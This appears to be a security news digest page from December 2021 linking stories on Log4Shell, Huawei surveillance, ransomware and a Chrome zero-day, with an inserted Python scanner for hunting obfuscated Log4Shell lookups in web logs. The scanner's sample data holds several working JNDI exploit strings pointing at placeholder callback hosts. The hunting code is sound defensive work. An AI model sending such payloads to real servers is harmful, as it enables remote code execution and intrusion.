Guidance for preventing, detecting, and hunting for CVE-2021-44228 Log4j 2 exploitation - Microsoft Security Blog

Microsoft's unified threat intelligence team, comprising the Microsoft Threat Intelligence Center (MSTIC), the Microsoft 365 Defender Threat Intelligence Team, RiskIQ, and the Microsoft Detection and Response Team (DART), among others, has been tracking threats taking advantage of CVE-2021-44228, a remote code execution (RCE) vulnerability in Apache Log4j 2 referred to as "Log4Shell".

Microsoft Security Blog
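The Microsoft guidance above is about hunting for Log4Shell, so here is a small hunt over web-server log lines. This is an added example, not code from the Microsoft post: the log lines are constructed, the callback addresses are documentation-range IPs, and the obfuscation tricks it undoes (`${lower:x}`, `${upper:x}`, and the `${...:-x}` default-value form nested inside a lookup) are the commonly seen ones, not an exhaustive list.

```python
"""Hunt for CVE-2021-44228 (Log4Shell) lookup strings in text logs.

Added example, not code from the Microsoft post. Log4j 2 lookups have the
form ${prefix:value}; the exploit abuses ${jndi:...}. Attackers hide the
literal "jndi" with nested lookups such as ${${lower:j}ndi:...} or
${${::-j}ndi:...}, which a naive grep for "jndi" misses. This scanner
resolves the common nesting tricks first, then matches on the result.
"""
import re
from typing import List, Optional

# Constructed sample lines (Apache combined format); the User-Agent field
# is where the payload usually lands. Addresses are documentation ranges.
SAMPLE_LOGS = [
    '10.0.0.5 - - [10/Dec/2021:13:01:22 +0000] "GET / HTTP/1.1" 200 612 "-" "Mozilla/5.0"',
    '10.0.0.7 - - [10/Dec/2021:13:02:10 +0000] "GET / HTTP/1.1" 200 612 "-" "${jndi:ldap://203.0.113.9:1389/a}"',
    '10.0.0.8 - - [10/Dec/2021:13:03:41 +0000] "GET /login HTTP/1.1" 200 612 "-" "${${lower:j}${upper:n}di:${::-l}dap://203.0.113.9:1389/b}"',
    '10.0.0.9 - - [10/Dec/2021:13:04:02 +0000] "GET / HTTP/1.1" 200 612 "-" "${${env:NaN:-j}ndi:rmi://198.51.100.4:1099/x}"',
    '10.0.0.3 - - [10/Dec/2021:13:05:30 +0000] "GET /?q=${date:yyyy} HTTP/1.1" 200 612 "-" "curl/7.79"',
]

# An innermost lookup: ${...} with no nested ${ inside its body.
_INNER = re.compile(r"\$\{([^${}]*)\}")

# A (possibly case-mangled) JNDI lookup, with scheme and callback host when
# they are present in plain text after normalisation.
JNDI = re.compile(
    r"\$\{\s*jndi\s*:\s*(?:(?P<scheme>[a-z][a-z0-9]*)://(?P<host>[^/\s}]+))?",
    re.IGNORECASE,
)


def _resolve_inner(body: str) -> Optional[str]:
    """Collapse one innermost lookup body if it is an obfuscation trick.

    Returns the replacement text, or None to leave the lookup untouched
    (the jndi lookup itself and anything we do not understand stay put).
    """
    if body.lower().startswith("jndi"):
        return None
    # Default-value form: ${::-j} or ${env:NaN:-j} both evaluate to "j".
    if ":-" in body:
        return body.split(":-", 1)[1]
    prefix, sep, value = body.partition(":")
    if sep and prefix.lower() == "lower":
        return value.lower()
    if sep and prefix.lower() == "upper":
        return value.upper()
    return None


def normalize(s: str, max_rounds: int = 32) -> str:
    """Repeatedly resolve innermost obfuscation lookups until stable."""
    for _ in range(max_rounds):
        changed = False

        def repl(m: "re.Match[str]") -> str:
            nonlocal changed
            out = _resolve_inner(m.group(1))
            if out is None:
                return m.group(0)
            changed = True
            return out

        s = _INNER.sub(repl, s)
        if not changed:
            break
    return s


def scan(lines: List[str]) -> List[dict]:
    """Return one finding per line that carries a JNDI lookup."""
    findings = []
    for n, line in enumerate(lines, 1):
        norm = normalize(line)
        m = JNDI.search(norm)
        if m:
            findings.append({
                "line": n,
                "scheme": (m.group("scheme") or "").lower() or None,
                "callback": m.group("host"),   # attacker-controlled host:port
                "obfuscated": norm != line,    # payload needed de-nesting
                "normalized": norm,
            })
    return findings


if __name__ == "__main__":
    for f in scan(SAMPLE_LOGS):
        print(f"line {f['line']}: jndi via {f['scheme']} -> {f['callback']}"
              f" (obfuscated={f['obfuscated']})")
```

The `${date:yyyy}` line is left alone on purpose: a grep for `${` alone would flag it, while this scanner only reports lookups that resolve to a JNDI prefix. The callback host is what you pivot on next: block it at egress and search outbound connection logs for it, because the LDAP/RMI fetch from the victim is the clearest sign exploitation went beyond scanning.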

Documents link Huawei to China's surveillance programs

These marketing presentations, posted to a public-facing Huawei website before the company removed them late last year, show Huawei pitching how its technologies can help government authorities identify individuals by voice, monitor political individuals of interest, manage ideological reeducation and labor schedules for prisoners, and help retailers track shoppers using facial recognition.

Washington Post

Ransomware attack on Australian utility claimed by Russian-speaking criminals

SAN FRANCISCO, Dec 8 (Reuters) - One of the most prolific Russian-speaking ransomware gangs has claimed credit for a weekend attack on an Australian electric utility serving millions of people. Australian media reported on Monday that Chinese government hackers were behind the breach at CS Energy, which is owned by the Queensland state in northeast Australia.

Reuters

Google Chrome Emergency Security Update For 2.6 Billion As Attacks Underway

Google has confirmed yet another security update for Chrome's 2.6 billion users, and this one is an emergency fix as there's a zero-day vulnerability that attackers are already exploiting. In all, Chrome version 96.0.4664.110 fixes no less than five vulnerabilities: four are high-rated, and one is critical.

Forbes

TinyNuke Banking Malware Targets French Entities | Proofpoint US

Proofpoint researchers identified ongoing activity from the banking malware TinyNuke. The activity almost exclusively targets French entities and organizations with operations in France. The campaigns leverage invoice-themed lures targeting entities in manufacturing, industry, technology, finance, and other verticals. The new activity marks a re-emergence of the malware, which peaked in popularity in 2018, now specifically targeting French users.

Proofpoint

Apple launches Tracker Detect app for Android to find unexpected AirTags, in effort to boost privacy

Apple has released a new Android app called Tracker Detect, designed to help people who don't own iPhones or iPads to identify unexpected AirTags and other Find My network-equipped sensors that may be nearby. The new app, which Apple released on the Google Play store Monday, is intended to help people look for item trackers compatible with Apple's Find My network.

CNET

Learn the Top Five Security Practices

During this live event, we reveal the top five security practices, based on data from our new Security Outcomes Study, Volume 2 cybersecurity report.

Cisco

Log4Shell: Reconnaissance and post exploitation network detection

Note: This blog post will be live-updated with new information. NCC Group's RIFT is intending to publish PCAPs of different exploitation methods in the near future. Last updated December 12th at 19:15 UTC. tl;dr: In the wake of the CVE-2021-44228 (a.k.a. Log4Shell) vulnerability publication, NCC Group's RIFT immediately started investigating the vulnerability in order to...

NCC Group Research

Billion-dollar natural gas supplier Superior Plus hit with ransomware | ZDNet

Major natural gas supplier Superior Plus announced on Tuesday that it is suffering from a ransomware attack. The billion-dollar propane seller said the incident started on December 12 but did not respond to questions about which ransomware group was behind the attack or exactly which systems were affected.

ZDNet